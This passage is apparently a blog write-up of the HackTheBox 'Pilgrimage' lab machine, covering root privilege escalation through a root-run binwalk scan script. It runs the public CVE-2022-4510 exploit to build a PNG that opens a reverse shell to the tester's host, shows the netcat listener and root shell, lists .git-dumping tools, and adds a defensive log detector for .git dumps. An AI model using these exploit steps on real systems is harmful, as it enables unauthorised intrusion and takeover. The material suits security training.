17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

Look for writable directories.

emily@pilgrimage:~/.local/share/nano$ find / -type d -writable 2>/dev/null
/proc/2716/task/2716/fd
/proc/2716/fd
/proc/2716/map_files
/run/user/1000
/run/user/1000/gnupg
/run/user/1000/systemd
/run/user/1000/systemd/units
/run/user/1000/systemd/inaccessible
/run/lock
/var/www/pilgrimage.htb/shrunk
/var/www/pilgrimage.htb/tmp
/var/lib/php/sessions
/var/tmp
/home/emily
/home/emily/.local
/home/emily/.local/share
/home/emily/.local/share/nano
/home/emily/.config
/home/emily/.config/binwalk
/home/emily/.config/binwalk/plugins
/home/emily/.config/binwalk/modules
/home/emily/.config/binwalk/config
/home/emily/.config/binwalk/magic
/dev/mqueue
/dev/shm
/sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service
/sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/app.slice
/sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/init.scope
/tmp
/tmp/.ICE-unix
/tmp/.X11-unix
/tmp/.font-unix
/tmp/.Test-unix
/tmp/.XIM-unix

Looking through the .config files turned up nothing. Looking at the process list, there is a shell script running, and it is owned by root.

emily@pilgrimage:~$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 746 0.0 0.0 6816 2352 ? S 15:50 0:00 /bin/bash /usr/sbin/malwarescan.sh
emily@pilgrimage:~$ ls -liah /usr/sbin/malwarescan.sh
31049 -rwxr--r-- 1 root root 474 Jun 1 19:14 /usr/sbin/malwarescan.sh
emily@pilgrimage:~$ cat /usr/sbin/malwarescan.sh
#!/bin/bash

blacklist=("Executable script" "Microsoft executable")

/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
binout="$(/usr/local/bin/binwalk -e "$filename")"
for banned in "${blacklist[@]}"; do
if [[ "$binout" == *"$banned"* ]]; then
/usr/bin/rm "$filename"
break
fi
done
done

Have ChatGPT explain the contents of this file.

# Create an array named blacklist containing two string elements
blacklist=("Executable script" "Microsoft executable")

# Use inotifywait to watch /var/www/pilgrimage.htb/shrunk/ for newly created files, and read its event output line by line in a while loop
/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do

    # Build the full file path: take the last line of FILE, strip everything up to and including "CREATE ", and append the rest to the directory path
    filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"

    # Run binwalk with extraction on that file and save its output in the binout variable
    binout="$(/usr/local/bin/binwalk -e "$filename")"

    # Iterate over the elements of the blacklist array
    for banned in "${blacklist[@]}"; do

        # If the contents of binout include one of the blacklist elements
        if [[ "$binout" == *"$banned"* ]]; then

            # Delete the file with rm, then break out of the loop
            /usr/bin/rm "$filename"
            break
        fi
    done
done

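binwalk command execution vulnerability + invocation by a root script

Since the script uses binwalk to process files, check whether binwalk has a vulnerability, so that the call to binwalk from the shell script running as root yields a reverse shell or privilege escalation.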

┌──(i3eg1nner㉿minilite)-[~/Downloads/Pilgrimage]
└─$ searchsploit binwalk
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Binwalk v2.3.2 - Remote Command Execution (RCE) | python/remote/51249.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

There is a code execution vulnerability; take a look.

with open("binwalk_exploit.png", "wb") as f:
    f.write(data)
    f.write(header_pfs)
    f.write(content)

print("")
print("You can now rename and share binwalk_exploit and start your local netcat listener.")

The end of the script appears to write a reverse shell into a PNG file, which is exactly what we need.

emily@pilgrimage:/tmp$ python3 51249.py vjp.png 10.10.14.145 443

################################################
------------------CVE-2022-4510----------------
################################################
--------Binwalk Remote Command Execution--------
------Binwalk 2.1.2b through 2.3.2 included-----
------------------------------------------------
################################################
----------Exploit by: Etienne Lacoche-----------
---------Contact Twitter: @electr0sm0g----------
------------------Discovered by:----------------
---------Q. Kaiser, ONEKEY Research Lab---------
---------Exploit tested on debian 11------------
################################################


You can now rename and share binwalk_exploit and start your local netcat listener.

emily@pilgrimage:/tmp$ ls
51249.py binwalk_exploit.png systemd-private-e23853b016894d04af52d9c886a7a73b-systemd-logind.service-NPxI5h systemd-private-e23853b016894d04af52d9c886a7a73b-systemd-timesyncd.service-2Jbd5e vjp.png vmware-root_609-3988556153

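The directory now contains a new binwalk_exploit.png. Start a listener on the local machine beforehand, then copy the file into the directory that the script continuously scans.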

emily@pilgrimage:/tmp$ cp binwalk_exploit.png /var/www/pilgrimage.htb/shrunk/

The reverse shell connected.

┌──(i3eg1nner㉿minilite)-[/usr/share/wordlists]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.145] from (UNKNOWN) [10.10.11.219] 49676
cd /root
ls
quarantine
reset.sh
root.txt
cat root.txt

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
uname -a
Linux pilgrimage 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64 GNU/Linux
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:e8:f2 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.219/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever

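Summary and review

The attack path on this machine is well designed. Instead of simply and crudely firing an exploit script to get a shell, it hides the scenario in a .git exposure and places the program behind the web service inside the repository. The program points to an arbitrary file read, and the leaked login.php names the database file the application connects to, so the idea of reading the database file follows naturally. The privilege escalation scenario is also carefully built, with the escalation path hidden among the running processes. Overall, this machine is good training for penetration-testing reasoning and for searching and investigating, and it is well worth doing.

Additional notes

HTB machines are updated frequently, and there is a lot of new knowledge to learn from them. In the past I may have rushed through the summary and the follow-up notes after finishing a machine without fully digesting it, so I have added these two sections, Summary and review and Additional notes, hoping to learn in more depth.

.git exposure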

.git exposure comes in two scenarios: one where directory indexing is enabled and one where it is disabled. The two cases also call for different tools.
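
With directory indexing disabled, as on this target (403 for /.git/ but 200 for /.git/HEAD and the object files), a dumper has to request every object by its hash, which leaves a recognizable pattern in the web server's access log. The following is an added example (not from the original post) of detection logic in Python for that pattern; it assumes nginx's combined log format, the threshold and function names are illustrative, and the log lines are constructed using documentation IP ranges.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# nginx "combined" access-log format (assumed; adjust if log_format differs).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) '
)
GIT_PATH_RE = re.compile(r"(^|/)\.git(/|$)")
# Loose objects live at objects/<2 hex>/<38 hex>, as in the gitdumper output.
GIT_OBJECT_RE = re.compile(r"/\.git/objects/[0-9a-f]{2}/[0-9a-f]{38}$")


def summarize_git_access(lines):
    """Count, per client IP, requests under .git and how many were served."""
    stats = defaultdict(lambda: {"git_requests": 0, "files_served": 0,
                                 "objects_served": 0, "objects_missed": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line
        # Drop the query string and decode %xx so /%2egit/ is not missed.
        path = unquote(m["path"].split("?", 1)[0])
        if not GIT_PATH_RE.search(path):
            continue
        entry = stats[m["ip"]]
        entry["git_requests"] += 1
        is_object = bool(GIT_OBJECT_RE.search(path))
        if m["status"] == "200":
            entry["files_served"] += 1
            if is_object:
                entry["objects_served"] += 1
        elif is_object:
            entry["objects_missed"] += 1
    return dict(stats)


def classify(entry, min_objects=3):
    """dump: objects were served; exposed: some file served; probe: nothing served."""
    if entry["objects_served"] >= min_objects:
        return "dump"
    if entry["files_served"] > 0:
        return "exposed"
    return "probe"


def report(lines, min_objects=3):
    return {ip: classify(entry, min_objects)
            for ip, entry in summarize_git_access(lines).items()}


def sample_line(ip, path, status):
    """Build one constructed combined-format log line."""
    return (f'{ip} - - [08/Jul/2023:03:44:01 +0000] "GET {path} HTTP/1.1" '
            f'{status} 0 "-" "-"')


# Constructed sample log; object paths follow the gitdumper listing on this page.
SAMPLE_LOG = [
    sample_line("192.0.2.10", "/.git/HEAD", 200),
    sample_line("192.0.2.10", "/.git/refs/heads/master", 200),
    sample_line("192.0.2.10", "/.git/objects/e1/a40beebc7035212efdcb15476f9c994e3634a7", 200),
    sample_line("192.0.2.10", "/.git/objects/f3/e708fd3c3689d0f437b2140e08997dbaff6212", 200),
    sample_line("192.0.2.10", "/.git/objects/93/ed6c0458c9a366473a6bcb919b1033f16e7a8d", 200),
    sample_line("192.0.2.10", "/.git/objects/00/" + "0" * 38, 404),
    sample_line("198.51.100.7", "/.git/", 403),
    sample_line("198.51.100.7", "/%2egit/config", 200),
    sample_line("203.0.113.5", "/.git/", 403),
    sample_line("203.0.113.5", "/index.php", 200),
    "not an access-log line",
]

if __name__ == "__main__":
    for ip, verdict in sorted(report(SAMPLE_LOG).items()):
        print(ip, verdict, summarize_git_access(SAMPLE_LOG)[ip])
```

A "dump" verdict means repository content left the server, so anything committed to it should be treated as disclosed.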

Tools

WangYihang/GitHacker: 🕷️ A ".git" folder exploitation tool that can restore the entire Git repository, including stash, common branches and common tags. (github.com)

lijiejie/GitHack: A .git folder disclosure exploit (github.com)

internetwache/GitTools: A repository with 3 tools for pwn’ing websites with .git repositories available (github.com)

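Judging by the results, GitHacker recovers more complete information, but it is probably also fairly noisy; pick whichever suits the need.

After downloading the .git folder, change into its directory and try the following commands to gather information: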

# View the log
git log

# View the changes in a commit
git diff <CommitId>

# View recent changes
git status

# Restore the working tree to the state of the last commit
git checkout -- .    # or: git restore .

Pilgrimage target machine
https://i3eg1nner.github.io/2023/07/e8652c909b79.html
Author: I3eg1nner
Published: July 8, 2023